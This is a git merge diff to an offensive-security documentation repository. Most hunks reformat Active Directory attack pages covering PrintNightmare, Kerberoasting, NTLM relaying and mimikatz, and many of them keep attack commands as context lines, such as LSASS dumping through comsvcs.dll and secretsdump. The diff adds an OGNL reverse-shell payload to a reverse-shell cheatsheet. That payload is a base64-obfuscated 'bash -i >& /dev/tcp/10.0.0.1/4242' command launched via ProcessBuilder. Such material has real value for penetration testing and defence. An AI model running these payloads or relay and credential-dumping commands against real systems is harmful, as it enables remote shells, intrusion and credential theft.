Merge branch 'swisskyrepo:main' into main

docs/active-directory/CVE/NoPAC.md

@@ -112,6 +112,7 @@ Automated exploitation:
     ```
 
 **Mitigations**:
+
 * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
 * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
 * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)

docs/active-directory/CVE/PrintNightmare.md

@@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
 The exploit will execute the DLL either from the local filesystem or a remote share.
 
 Requirements:
+
 * **Spooler Service** enabled (Mandatory)
 * Server with patches < June 2021
 * DC with `Pre Windows 2000 Compatibility` group
@@ -14,6 +15,7 @@ Requirements:
 
 
 **Detect the vulnerability**:
+
 * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
   ```ps1
   python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
@@ -28,20 +30,23 @@ Requirements:
   ```
 
 **Payload Hosting**: 
+
 * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109):
-```ps1
-python3 ./smbserver.py share /tmp/smb/
-```
+  ```ps1
+  python3 ./smbserver.py share /tmp/smb/
+  ```
 * Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): 
-```ps1
-Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
-```
+  ```ps1
+  Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
+  ```
 * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights):
-```ps1
-SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
-```
+  ```ps1
+  SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
+  ```
+
 When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll`
 WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
+
 ```ps1
 cme smb -u user -p password -d domain.local -M webdav [TARGET]
 ```

docs/active-directory/ad-adds-enumerate.md

@@ -2,11 +2,14 @@
 
 ## Using BloodHound
 
-Use the correct collector
+Use the correct collector:
+
 * AzureHound for Azure Active Directory
 * SharpHound for local Active Directory
 * RustHound for local Active Directory
 
+**Examples**:
+
 * use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
 
 * use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
@@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up
 ```
 
 You can add some custom queries like :
+
 * [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
 * [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
 * [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)

docs/active-directory/ad-adds-ntds-dumping.md

@@ -5,6 +5,7 @@ You will need the following files to extract the ntds :
 - SYSTEM hive (`C:\Windows\System32\SYSTEM`)
 
 Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
+
 - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
 - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
 
@@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
 ```
 
 :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
+
 - [hashmob.net](https://hashmob.net)
 - [crackstation.net](https://crackstation.net)
 - [hashes.com](https://hashes.com/en/decrypt/hash)

docs/active-directory/ad-roasting-asrep.md

@@ -3,6 +3,7 @@
 > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
 
 **Requirements**:
+
 * Accounts with the attribute **DONT_REQ_PREAUTH**
   * Windows/Linux:
     ```ps1
@@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
 ```
 
 **Mitigations**: 
-* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
 
+* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
 
 
 ## Kerberoasting w/o domain account
@@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w
 Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
 
 **Requirements**:
+
 * Accounts with the attribute **DONT_REQ_PREAUTH**
   * Windows/Linux:
     ```ps1
@@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
     PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
     ```
 
-* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
+* Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
   ```bash
   user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
   user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
@@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
   ```
 
 **Mitigations**: 
+
 * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
 * Disable RC4 cipher if possible.
 

docs/active-directory/ad-roasting-kerberoasting.md

@@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
 
 
 **Mitigations**: 
+
 * Have a very long password for your accounts with SPNs (> 32 characters)
 * Make sure no users have SPNs
 

docs/active-directory/deployment-sccm.md

@@ -67,7 +67,8 @@
 
 > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
 
-On the machine.
+On the machine
+
 * Find SCCM blob
     ```ps1
     Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"

docs/active-directory/hash-capture.md

@@ -2,14 +2,16 @@
 
 ## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
 
-> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. 
+> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. 
 
 :information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
 
 **Requirements**:
+
 * LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
 
 **Exploitation**:
+
 * Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
     ```ps1
     HTTPS = On
@@ -68,6 +70,7 @@
 
 * Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
 
+
 ## Capturing and cracking Net-NTLMv2/NTLMv2 hashes
 
 If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.

docs/active-directory/internal-mitm-relay.md

@@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets
 ## LDAP signing not required and LDAP channel binding disabled
 
 During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
+
 * LDAP signing not required (by default set to `Not required`)
 * LDAP channel binding is disabled. (by default disabled)
 * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
 
 Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
+
 ```bash
 # On first terminal
 sudo ./Responder.py -I eth0 -wfrd -P -v
@@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
     TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
     ```
 
-
 - Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
+
     ```powershell
     # create a new machine account
     TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support 
@@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
 ## Ghost Potato - CVE-2019-1384
 
 Requirements:
+
 * User must be a member of the local Administrators group
 * User must be a member of the Backup Operators group
 * Token must be elevated
@@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
 > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
 
 Requirements:
+
 - a shell in session 0 (e.g. WinRm shell or SSH shell)
 - a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
 
@@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
 ## DNS Poisonning - Relay delegation with mitm6
 
 Requirements: 
+
 - IPv6 enabled (Windows prefers IPV6 over IPv4)
 - LDAP over TLS (LDAPS)
 
@@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local
 > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
 
 **Requirement**:
+
 *  WebClient service
 
 **Exploitation**:
+
 * Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
 * Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
 * Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
@@ -267,12 +274,16 @@ pyrdp-mitm.py <IP>
 pyrdp-mitp.py <IP>:<PORT> # with custom port
 pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
 ```
-* Exploitation
-  * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
-  * If NLA is disabled, you will obtain the password in plaintext
-  * Other features are available such as keystroke recording
-* Alternatives
-  * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener	
+
+**Exploitation**
+
+* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
+* If NLA is disabled, you will obtain the password in plaintext
+* Other features are available such as keystroke recording
+
+**Alternatives**
+
+* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener	
 
 
 ## References

docs/active-directory/kerberos-bronze-bit.md

@@ -9,6 +9,7 @@ CVE-2020-17049
 :warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
 
 Requirements:
+
 * Service account's password hash 
 * Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
 * [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) 

docs/active-directory/kerberos-tickets.md

@@ -111,6 +111,7 @@ Converting kirbi => ccache
 
 
 Mitigations:
+
 * Hard to detect because they are legit TGT tickets
 * Mimikatz generate a golden ticket with a life-span of 10 years
 
@@ -148,6 +149,7 @@ Interesting services to target with a silver ticket :
 
 
 Mitigations:
+
 * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
 
 
@@ -155,7 +157,8 @@ Mitigations:
 
 > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
 
-Require: 
+Requirements:
+
 * krbtgt NT Hash
 * krbtgt AES key
 
@@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR
 
 The goal is to mimic the PAC field as close as possible to a legitimate one.
 
-Require:
+Requirements:
+
 * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
 * krbtgt AES key
 

docs/cheatsheets/mimikatz-cheatsheet.md

@@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
   * Adding requires lock
   * Removing requires reboot
 
+
 ## LSA Protection Workaround
 
 - LSA as a Protected Process (RunAsPPL)
@@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
 
 
 Use the minidump:
+
 * Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
   ```powershell
   mimikatz # sekurlsa::minidump lsass.dmp

docs/cheatsheets/shell-reverse-cheatsheet.md

@@ -22,6 +22,7 @@
     * [Netcat BusyBox](#netcat-busybox)
     * [Netcat Traditional](#netcat-traditional)
     * [NodeJS](#nodejs)
+    * [OGNL](#ognl)
     * [OpenSSL](#openssl)
     * [Perl](#perl)
     * [PHP](#php)
@@ -389,6 +390,16 @@ or
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
 
+
+### OGNL
+
+```java
+(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
+```
+
+With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell.
+
+
 ### Groovy
 
 by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)